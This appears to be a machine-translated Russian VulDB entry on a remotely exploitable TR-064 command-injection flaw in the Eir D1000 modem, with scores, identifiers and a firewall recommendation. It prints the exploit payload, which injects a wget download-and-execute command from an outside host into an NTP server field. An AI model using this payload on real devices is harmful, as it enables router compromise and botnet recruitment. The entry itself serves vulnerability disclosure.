CVSS Meta Temp Score | Текущая цена эксплуатации (≈) | Балл интереса CTI |
---|---|---|
9.6 | $0-$5k | 0.00 |
В Eir D1000 Modem была найдена уязвимость, классифицированная как очень критический. Затронута неизвестная функция компонента TR-069. Использование CWE для объявления проблемы приводит к тому, что CWE-269. Консультация доступна для скачивания по адресу devicereversing.wordpress.com. Продавец не участвовал в публичном выпуске.
Технические подробности отсутствуют. Популярность этой уязвимости выше среднего. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время. Проект MITRE ATT&CK объявляет технику атаки как T1068. Консультация указывает:
What is not very well known is that the server on port 7457 is also a TR-064 server. This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.
Объявляется Высокофункциональный. Эксплойт доступен по адресу devicereversing.wordpress.com. В 0-дневный период предполагаемая подземная цена составляла около $25k-$100k. Код, используемый эксплойтом, следующий:
<NewNTPServer1> `cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1` </NewNTPServer1>
Рекомендуется применять ограничительный брандмауэр.
Затронуто
- Telekom Speedport Modem
Продукт
Поставщик
Имя
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Вектор: 🔍
VulDB Надежность: 🔍
CVSSv3
VulDB Meta Base Score: 9.8VulDB Meta Temp Score: 9.6
VulDB Базовый балл: 9.8
VulDB Временная оценка: 9.6
VulDB Вектор: 🔍
VulDB Надежность: 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
Вектор | Сложность | Аутентификация | Конфиденциальность | Целостность | Доступность |
---|---|---|---|---|---|
разблокировать | разблокировать | разблокировать | разблокировать | разблокировать | разблокировать |
разблокировать | разблокировать | разблокировать | разблокировать | разблокировать | разблокировать |
разблокировать | разблокировать | разблокировать | разблокировать | разблокировать | разблокировать |
VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надежность: 🔍
Эксплуатация
Класс: эскалация привилегийCWE: CWE-269 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
Локальный: Нет
Удаленный: Да
Доступность: 🔍
Доступ: публичный
Статус: Высокофункциональный
Язык программирования: 🔍
Скачать: 🔍
Прогнозирование цены: 🔍
Оценка текущей цены: 🔍
0-Day | разблокировать | разблокировать | разблокировать | разблокировать |
---|---|---|---|---|
Сегодня | разблокировать | разблокировать | разблокировать | разблокировать |
Разведка угроз
Интерес: 🔍Активные акторы: 🔍
Активные группы APT: 🔍
Контрмеры
Рекомендуется: FirewallСтатус: 🔍
0-дневное время: 🔍
Время задержки эксплойта: 🔍
Firewalling: 🔍
Временная шкала
07.11.2016 🔍07.11.2016 🔍
30.11.2016 🔍
13.06.2019 🔍
Источники
Консультация: Eir’s D1000 Modem Is Wide Open To Being Hacked.Исследователь: kenzo2017
Статус: Подтвержденный
scip Labs: https://www.scip.ch/en/?labs.20161013
Смотрите также: 🔍
Вход
Создано: 30.11.2016 12:05Обновлено: 13.06.2019 06:43
Изменения: 30.11.2016 12:05 (52), 13.06.2019 06:43 (1)
Завершить: 🔍
Комментариев пока нет. Языки: ru + en.
Пожалуйста, войдите в систему, чтобы прокомментировать.